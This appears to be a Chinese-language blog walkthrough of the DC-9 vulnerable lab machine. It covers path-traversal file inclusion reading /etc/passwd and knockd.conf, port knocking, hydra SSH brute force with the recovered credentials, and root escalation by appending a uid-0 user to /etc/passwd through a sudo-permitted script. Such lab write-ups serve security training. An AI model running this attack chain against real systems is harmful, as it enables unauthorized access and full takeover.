DC-9

1、文件包含:

http://192.168.142.139/welcome.php?file=../../../../../../../../../etc/passwd

  

2、敲门服务:

http://192.168.178.135/manage.php?file=../../../../../../../../../etc/knockd.conf
[options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn
敲门的判断
nmap -P 22 192.168.178.135
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http

nc -nv 192.168.178.135 7469
nc -nv 192.168.178.135 8475
nc -nv 192.168.178.135 9842

或者
nmap -p 7469 192.168.178.135
nmap -p 8475 192.168.178.135
nmap -p 9842 192.168.178.135

nmap -P 22 192.168.178.135
PORT STATE SERVICE
22/tcp open ssh //已经打开
80/tcp open http

3、hydra暴力破解SSH用户名密码:

hydra -L user-dict -P pass-dict 192.168.178.135 ssh
或者hydra -L user-dict -P pass-dict ssh://192.168.178.135

[22][ssh] host: 192.168.178.135 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.178.135 login: janitor password: Ilovepeepee

SSH登录

ssh janitor@192.168.178.135

ls -a //发现隐藏文件目录.secrets-for-putin/passwords-found-on-post-it-notes.txt
打开发现密码字典
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
加入pass-dict继续重新破解
hydra -L user-dict -P pass-dict 192.168.178.135 ssh
发现另一个用户(登录)
ssh fredf@192.168.142.139 --B4-Tru3-001
sudo -l
发现发现可以无密码root身份运行test脚本
cd /opt/devstuff/dist/test/
./test
Usage: python test.py read append

find / -name test.py 2>/dev/null      //发现文件/opt/devstuff/test.py

 

fredf@dc-9:/opt/devstuff/dist/test$ cat /opt/devstuff/test.py

#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
print ("Usage: python test.py read append")
sys.exit (1)

else :
f = open(sys.argv[1], "r")
output = (f.read())

f = open(sys.argv[2], "a")
f.write(output)
f.close()

  

//分析文件,作用将一个文件内容追加到另一个文件中
怎么办?分析可以创建一个拥有root权限的新用户,再将信息通过这个test.py写入到/etc/passwd
干吧!


4、使用openssl先创建一个本地加密用户

openssl passwd -1 -salt admin 123456
// -1 的意思是使用md5加密算法
// -salt 自动插入一个随机数作为文件内容加密

 

$1$admin$LClYcRe.ee8dQwgrFc5nz.

 

5、提权

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
cd /opt/devstuff/dist/test/
sudo ./test /tmp/passwd /etc/passwd 追加root权限的用户
su admin 输入密码123456
whoami
cd /root
ls -a
cat theflag.txt

 

posted @ 2022-08-18 01:15  boomohg  阅读(93)  评论(0编辑  收藏  举报